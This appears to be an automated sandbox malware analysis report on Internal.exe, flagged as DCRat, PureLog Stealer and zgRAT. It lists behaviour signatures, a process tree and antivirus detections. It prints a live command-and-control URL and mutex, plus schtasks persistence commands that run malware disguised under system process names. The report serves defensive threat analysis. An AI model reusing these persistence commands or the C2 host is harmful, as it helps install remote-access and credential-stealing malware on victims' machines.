Windows Analysis Report
Internal.exe

Overview

General Information

Sample name: Internal.exe
Analysis ID: 1498678
MD5: 15e81b6e3999600603d0f8b0dd22c33e
SHA1: 8b76e5db4c4344dc6a011310892d026f2ff95906
SHA256: 3a809ac2c5f55a839e15387cb84eba8adee8f402fda2736894d797a57b3e2eb1
Tags: exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Internal.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\Internal.exe" MD5: 15E81B6E3999600603D0F8B0DD22C33E)
    • wscript.exe (PID: 6748 cmdline: "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7080 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AgentMonitor.exe (PID: 2300 cmdline: "C:\Blockcomcrt/AgentMonitor.exe" MD5: 84072063FC067434706597D88E3252A9)
          • schtasks.exe (PID: 3324 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2852 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4132 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 3456 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 4200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6D0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 6680 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 4568 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8B5.tmp" "c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 5868 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6588 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4508 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5628 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6984 cmdline: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2700 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5548 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 764 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4832 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7052 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 7 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1836 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7092 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 10 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6692 cmdline: schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3116 cmdline: schtasks.exe /create /tn "AgentMonitor" /sc ONLOGON /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 564 cmdline: schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 12 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 632 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3996 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 4476 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • WmiPrvSE.exe (PID: 4032 cmdline: "C:\Blockcomcrt\WmiPrvSE.exe" MD5: 84072063FC067434706597D88E3252A9)
  • yxeaYbTPMzNPCanFqSswYWhX.exe (PID: 4536 cmdline: "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe" MD5: 84072063FC067434706597D88E3252A9)
  • yxeaYbTPMzNPCanFqSswYWhX.exe (PID: 4788 cmdline: "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe" MD5: 84072063FC067434706597D88E3252A9)
  • AgentMonitor.exe (PID: 5612 cmdline: C:\Blockcomcrt\AgentMonitor.exe MD5: 84072063FC067434706597D88E3252A9)
  • AgentMonitor.exe (PID: 5904 cmdline: C:\Blockcomcrt\AgentMonitor.exe MD5: 84072063FC067434706597D88E3252A9)
  • csrss.exe (PID: 6856 cmdline: C:\Recovery\csrss.exe MD5: 84072063FC067434706597D88E3252A9)
  • csrss.exe (PID: 2920 cmdline: C:\Recovery\csrss.exe MD5: 84072063FC067434706597D88E3252A9)
  • cleanup
{"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-lbrp3oxXXiUX78hSSIVX", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| Internal.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| Internal.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| C:\Blockcomcrt\WmiPrvSE.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000006.00000000.1708671234.0000000000832000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 00000010.00000002.2655054570.0000000003A48000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| 00000001.00000003.1412731329.0000000007801000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| 00000001.00000003.1412020893.0000000006E0A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 1.3.Internal.exe.793f2eb.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| 1.3.Internal.exe.793f2eb.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 1.3.Internal.exe.6f482eb.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| 1.3.Internal.exe.6f482eb.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 6.0.AgentMonitor.exe.830000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Blockcomcrt\AgentMonitor.exe, ProcessId: 2300, TargetFilename: C:\Recovery\csrss.exe
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: "C:\Users\Default\Recent\StartMenuExperienceHost.exe", EventID: 13, EventType: SetValue, Image: C:\Blockcomcrt\AgentMonitor.exe, ProcessId: 2300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: C:\Recovery\csrss.exe, CommandLine: C:\Recovery\csrss.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\csrss.exe, NewProcessName: C:\Recovery\csrss.exe, OriginalFileName: C:\Recovery\csrss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Recovery\csrss.exe, ProcessId: 6856, ProcessName: csrss.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe", EventID: 13, EventType: SetValue, Image: C:\Blockcomcrt\AgentMonitor.exe, ProcessId: 2300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yxeaYbTPMzNPCanFqSswYWhX
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: explorer.exe, "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe", EventID: 13, EventType: SetValue, Image: C:\Blockcomcrt\AgentMonitor.exe, ProcessId: 2300, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Blockcomcrt/AgentMonitor.exe", ParentImage: C:\Blockcomcrt\AgentMonitor.exe, ParentProcessId: 2300, ParentProcessName: AgentMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", ProcessId: 3456, ProcessName: csc.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Internal.exe", ParentImage: C:\Users\user\Desktop\Internal.exe, ParentProcessId: 6720, ParentProcessName: Internal.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe" , ProcessId: 6748, ProcessName: wscript.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Blockcomcrt\AgentMonitor.exe, ProcessId: 2300, TargetFilename: C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline
Source: Process started; Author: vburov; Data: Command: C:\Recovery\csrss.exe, CommandLine: C:\Recovery\csrss.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\csrss.exe, NewProcessName: C:\Recovery\csrss.exe, OriginalFileName: C:\Recovery\csrss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Recovery\csrss.exe, ProcessId: 6856, ProcessName: csrss.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Blockcomcrt/AgentMonitor.exe", ParentImage: C:\Blockcomcrt\AgentMonitor.exe, ParentProcessId: 2300, ParentProcessName: AgentMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", ProcessId: 3456, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f, CommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Blockcomcrt/AgentMonitor.exe", ParentImage: C:\Blockcomcrt\AgentMonitor.exe, ParentProcessId: 2300, ParentProcessName: AgentMonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f, ProcessId: 5628, ProcessName: schtasks.exe

Timestamp: 2024-08-25T15:45:44.649080+0200
SID: 2048095
Severity: 1
Source Port: 49707
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: Internal.exe; Avira: detected
Source: http://373292cm.nyashka.top; Avira URL Cloud: Label: malware
Source: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php; Avira URL Cloud: Label: malware
Source: http://373292cm.nyashka.top/; Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Blockcomcrt\WmiPrvSE.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\fXTLLrxO.log; Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\wekqfedd.log; Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat; Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\mVSSSdRf.log; Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe; Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\bQCMLIKB.log; Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\csrss.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Blockcomcrt\AgentMonitor.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000006.00000002.1763759179.0000000012E58000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: DCRat {"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-lbrp3oxXXiUX78hSSIVX", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: 373292cm.nyashka.top; Virustotal: Detection: 18%
Source: http://373292cm.nyashka.top; Virustotal: Detection: 18%
Source: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php; Virustotal: Detection: 17%
Source: http://373292cm.nyashka.top/; Virustotal: Detection: 18%
Source: C:\Blockcomcrt\AgentMonitor.exe; ReversingLabs: Detection: 87%
Source: C:\Blockcomcrt\AgentMonitor.exe; Virustotal: Detection: 54%
Source: C:\Blockcomcrt\WmiPrvSE.exe; ReversingLabs: Detection: 87%
Source: C:\Blockcomcrt\WmiPrvSE.exe; Virustotal: Detection: 54%
Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe; ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe; Virustotal: Detection: 54%
Source: C:\Recovery\csrss.exe; ReversingLabs: Detection: 87%
Source: C:\Recovery\csrss.exe; Virustotal: Detection: 54%
Source: C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe; ReversingLabs: Detection: 87%
Source: C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe; Virustotal: Detection: 54%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe; ReversingLabs: Detection: 87%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe; Virustotal: Detection: 54%
Source: C:\Users\user\Desktop\RypOpByW.log; Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\UjoVbfCg.log; Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\Vmjnufha.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\Vmjnufha.log; Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\WuLVbyih.log; ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\WuLVbyih.log; Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\ZcxEZvOD.log; ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\ZcxEZvOD.log; Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\bQCMLIKB.log; Virustotal: Detection: 21%
Source: C:\Users\user\Desktop\cQVCqZDT.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\cQVCqZDT.log; Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\fXTLLrxO.log; Virustotal: Detection: 21%
Source: C:\Users\user\Desktop\mVSSSdRf.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\mVSSSdRf.log; Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\wekqfedd.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\wekqfedd.log; Virustotal: Detection: 69%
Source: Internal.exe; Virustotal: Detection: 68%
Source: Internal.exe; ReversingLabs: Detection: 76%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\RypOpByW.log; Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\UjoVbfCg.log; Joe Sandbox ML: detected
Source: C:\Blockcomcrt\WmiPrvSE.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\wekqfedd.log; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\mVSSSdRf.log; Joe Sandbox ML: detected
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe; Joe Sandbox ML: detected
Source: C:\Recovery\csrss.exe; Joe Sandbox ML: detected
Source: C:\Blockcomcrt\AgentMonitor.exe; Joe Sandbox ML: detected
Source: Internal.exe; Joe Sandbox ML: detected
Source: Internal.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Internal.exe, Internal.exe, 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.pdb source: AgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.pdb source: AgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\Internal.exe; Code function: 1_2_004FA69B FindFirstFileW,FindFirstFileW,1_2_004FA69B
